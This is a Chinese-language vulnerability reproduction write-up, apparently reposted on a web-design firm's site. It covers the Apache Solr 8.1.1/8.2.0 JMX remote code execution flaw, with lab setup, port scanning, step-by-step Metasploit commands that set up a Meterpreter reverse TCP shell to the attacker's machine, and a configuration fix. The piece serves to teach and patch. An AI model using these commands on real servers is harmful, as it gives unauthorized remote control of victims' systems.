這篇文章將為大家詳細講解有關如何進行Apache Solr JMX服務RCE漏洞復現(xiàn)，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

在梁溪等地區(qū)，都構建了全面的區(qū)域性戰(zhàn)略布局，加強發(fā)展的系統(tǒng)性、市場前瞻性、產(chǎn)品創(chuàng)新能力，以專注、極致的服務理念，為客戶提供成都網(wǎng)站制作、成都網(wǎng)站設計 網(wǎng)站設計制作定制網(wǎng)站建設,公司網(wǎng)站建設,企業(yè)網(wǎng)站建設,品牌網(wǎng)站建設,全網(wǎng)整合營銷推廣,外貿(mào)網(wǎng)站制作,梁溪網(wǎng)站建設費用合理。

0x00簡介

Solr是一個獨立的企業(yè)級搜索應用服務器，它對外提供類似于Web-service的API接口。用戶可以通過http請求，向搜索引擎服務器提交一定格式的XML文件，生成索引；也可以通過Http Get操作提出查找請求，并得到XML格式的返回結果。

該漏洞源于默認配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置選項存在安全風險。

  Apache Solr的8.1.1和8.2.0版本的自帶配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"選項。

如果使用受影響版本中的默認solr.in.sh文件，那么將啟用JMX監(jiān)視并將其暴露在RMI_PORT上（默認值= 18983），

并且無需進行任何身份驗證。 如果防火墻中的入站流量打開了此端口，則具有Solr節(jié)點網(wǎng)絡訪問權限的任何人都將能夠訪問JMX，

  并且可以上傳惡意代碼在Solr服務器上執(zhí)行。該漏洞不影響Windows系統(tǒng)的用戶,僅影響部分版本的Linux用戶。

0x01影響版本

Apache Solr8.1.1版本上線時間：2019-05-28

Apache Solr8.2.0版本上線時間：2019-07-25

0x02漏洞危害

  如果受害者使用了該默認配置，則會在默認端口18983開放JMX服務，且默認未開啟認證。任何可訪問此端口的攻擊者可利用此漏洞向受影響服務發(fā)起攻擊，執(zhí)行任意代碼。

0x03環(huán)境搭建

Java環(huán)境和kali系統(tǒng)、Solr 8.20

Solr 8.20 下載地址：

wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

使用unzip solr-8.2.0.zip解壓

解壓完成后，切換到bin目錄啟動Solr

./solr  start  -force

啟動后訪問：http://192.168.10.176:8983/

0x04漏洞復現(xiàn)

攻擊機：kali IP：192.168.10.147

受害機：Ubuntu18.6中docker IP：192.168.10.184:8983

1、使用nmap掃描端口后發(fā)現(xiàn)18983端口開啟

2、使用Metasploit中的exploit/multi/misc/java_jmx_server模塊進行漏洞復現(xiàn)

? use exploit/multi/misc/java_jmx_server

? set RHOST 192.168.10.184

? set RPORT 18983

再來設置payload：java/meterpreter/reverse_tcp

? set payload java/meterpreter/reverse_tcp

? set LHOST 192.168.10.147

? set LPORT  4444

3、使用run執(zhí)行，即可看到成功建立連接

0x05修復建議

將solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS選項設置為false，然后重啟Solr服務。

關于如何進行Apache Solr JMX服務RCE漏洞復現(xiàn)就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。

本文題目：如何進行ApacheSolrJMX服務RCE漏洞復現(xiàn)
轉(zhuǎn)載注明：http://www.chinadenli.net/article48/jsgdhp.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供全網(wǎng)營銷推廣、商城網(wǎng)站、網(wǎng)站設計公司、建站公司、微信小程序、網(wǎng)站改版

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)